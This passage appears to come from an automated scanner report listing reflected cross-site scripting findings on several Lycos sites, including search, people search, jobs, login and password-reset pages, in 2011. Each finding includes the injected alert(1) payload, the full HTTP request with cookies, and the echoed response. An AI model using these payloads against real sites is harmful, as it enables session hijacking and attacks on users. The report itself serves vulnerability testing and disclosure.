The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 was submitted in the x parameter. This input was echoed as fe453"style="x:expression(alert(1))"5103e16dd11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?x=1fe453"style%3d"x%3aexpression(alert(1))"5103e16dd11 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:23:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:47 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1fe453"style="x:expression(alert(1))"5103e16dd11&amp;q=">
...[SNIP]...

1.275. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc14"><script>alert(1)</script>f33690b523c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&7cc14"><script>alert(1)</script>f33690b523c=1&mobile=1">
...[SNIP]...

1.276. http://peoplesearch.lycos.com/ [search-type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7741c"><script>alert(1)</script>24c511f9dc0 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:23:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&search-type=white_pages7741c"><script>alert(1)</script>24c511f9dc0&mobile=1">
...[SNIP]...

1.277. http://peoplesearch.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3474d"><script>alert(1)</script>4e2dee260c6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people3474d"><script>alert(1)</script>4e2dee260c6 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.4.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people3474d"><script>alert(1)</script>4e2dee260c6&mobile=1">
...[SNIP]...

1.278. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac3a"><script>alert(1)</script>a1eccbcbc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?7ac3a"><script>alert(1)</script>a1eccbcbc12=1 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:23:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?7ac3a"><script>alert(1)</script>a1eccbcbc12=1&mobile=1">
...[SNIP]...

1.279. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://registration.lycos.com
Path:   /forgot.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba03"><script>alert(1)</script>06d84703f11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgot.php/cba03"><script>alert(1)</script>06d84703f11 HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; isMobile=nonmobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:01 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 15:24:00 GMT
Set-Cookie: isMobile=nonmobile; expires=Mon, 07-Feb-2011 16:24:01 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5935
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="http://hb
...[SNIP]...
<form action="/forgot.php/cba03"><script>alert(1)</script>06d84703f11" method="post">
...[SNIP]...

1.280. https://registration.lycos.com/login.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /login.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131eb"><script>alert(1)</script>7bbbd5c508a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php/131eb"><script>alert(1)</script>7bbbd5c508a HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:47 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:46 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:47 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 6032
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
<title>LYCOS NETWORK: Registration Login</title>
       
...[SNIP]...
<form action="/login.php/131eb"><script>alert(1)</script>7bbbd5c508a" method="post" style="padding:0px; margin:0px;">
...[SNIP]...

1.281. https://registration.lycos.com/lostpassword.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d547"><script>alert(1)</script>f9f2dd8189d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/8d547"><script>alert(1)</script>f9f2dd8189d HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090495178369; __utmc=207906063; isMobile=mobile; __utmb=207906063.7.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:45 GMT
Server:
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:56:44 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:56:45 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5956
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/8d547"><script>alert(1)</script>f9f2dd8189d" method="post">
...[SNIP]...

1.282. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd73"><script>alert(1)</script>f4f3653e469 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/5dd73"><script>alert(1)</script>f4f3653e469=%22x:expre/**/ssion(alert(9)) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: registration.lycos.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:55:04 GMT
Server:
Set-Cookie: PENTA=173.193.214.243.1297090504967514; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/5dd73"><script>alert(1)</script>f4f3653e469="x:expre/**/ssion(alert(9))" method="post">
...[SNIP]...

1.283. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://registration.lycos.com
Path:   /lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 2f10a><script>alert(1)</script>016b58e2edc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lostpassword.php/%22%20stYle2f10a><script>alert(1)</script>016b58e2edc=%22x:expre/**/ssion(alert(9)) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: registration.lycos.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:55:04 GMT
Server:
Set-Cookie: PENTA=173.193.214.243.1297090504527301; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT
Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5990
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="https://h
...[SNIP]...
<form action="/lostpassword.php/" stYle2f10a><script>alert(1)</script>016b58e2edc="x:expre/**/ssion(alert(9))" method="post">
...[SNIP]...

1.284. http://search.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ba"%3balert(1)//af5066fd037 was submitted in the cat parameter. This input was echoed as e81ba";alert(1)//af5066fd037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=multi&cat=imagese81ba"%3balert(1)//af5066fd037 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ddfqsr2hppq8qij9d4ieqghss2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_imagese81ba";alert(1)//af5066fd037";
//-->
...[SNIP]...

1.285. http://search.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b73"><script>alert(1)</script>052c690a4be was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=multi&cat=images92b73"><script>alert(1)</script>052c690a4be HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=2hh4b57i87910i70ds7mfjm932; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images92b73"><script>alert(1)</script>052c690a4be&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.286. http://search.lycos.com/ [mobile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32777"><script>alert(1)</script>df0c8dd5168 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=hjmhvrge1a613s8sqffiuss0k4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168&diktfc=6A6DBC228ADE4617A913BE636EF29CDEDBB6A4EBFE67&mobile=1">
...[SNIP]...

1.287. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9be9"><script>alert(1)</script>3e6249bcdc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?e9be9"><script>alert(1)</script>3e6249bcdc4=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ui1o7s14njsg0a3gcq4g4tjrk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?e9be9"><script>alert(1)</script>3e6249bcdc4=1&diktfc=2B57C99267C3BB3AB84E408578CBAC3EF52B542AF4EE&mobile=1">
...[SNIP]...

1.288. http://search.lycos.com/ [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75975"><script>alert(1)</script>6c6e640c41d was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:18 GMT; path=/
Set-Cookie: LYCOS_SEARCH=a7jqf2o9trkq33mjlrtdhcmgs1; path=/
